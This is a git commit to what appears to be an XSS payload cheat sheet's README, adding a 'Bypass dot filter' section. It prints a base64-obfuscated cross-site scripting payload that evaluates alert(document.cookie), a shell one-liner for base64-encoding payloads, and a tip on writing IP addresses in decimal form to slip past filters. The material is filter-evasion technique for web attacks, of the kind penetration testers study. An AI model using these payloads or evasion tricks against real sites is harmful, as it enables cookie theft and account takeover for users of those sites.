Update README.md

Add Bypass dot filter
This commit is contained in:
idealphase 2021-11-10 22:38:02 +07:00 committed by GitHub
parent 7647407266
commit 6c7df7dc4e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -663,6 +663,12 @@ You can bypass a single quote with ' in an on mousedown event handler
Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777`
http://www.geektools.com/cgi-bin/ipconv.cgi
```javascript
<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
```
Base64 encoding your XSS payload with linux command: echo -n "alert(document.cookie)" | base64
### Bypass parenthesis for string
```javascript